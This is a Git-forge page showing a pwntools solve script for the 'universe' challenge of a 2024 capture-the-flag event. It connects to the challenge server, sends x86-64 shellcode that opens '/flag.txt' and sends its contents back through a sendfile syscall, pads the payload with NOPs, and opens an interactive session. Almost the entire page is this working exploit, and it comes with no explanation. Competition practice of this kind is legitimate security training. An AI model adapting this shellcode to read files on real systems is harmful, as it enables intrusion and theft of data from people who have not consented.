jc/ctfs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
ae35bfa8d3f2b73696589c6b8c1f4f45a34f4e97
ctfs/africabattlectf_2024/universe/a.py
T
jc ae35bfa8d3 solve script
2024-10-22 13:52:27 +03:00

28 lines
468 B
Python
Raw Blame History

#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./universe", checksec=False)
# r = process()
r = remote("challenge.bugpwn.com", 1004)
# openat + sendfile
shellcode="""
lea rsi, [rdx+35]
mov edi, -100
xor rdx, rdx
xor r10, r10
add ax, 257
syscall
mov rsi, rax
mov al, 40
shr edi, 255
add r10b, 255
syscall
"""
shellcode = asm(shellcode)
shellcode += b"/flag.txt\0"
shellcode += b"\x90"*(4096-len(shellcode))
r.sendline(shellcode)
r.interactive()
Reference in New Issue View Git Blame Copy Permalink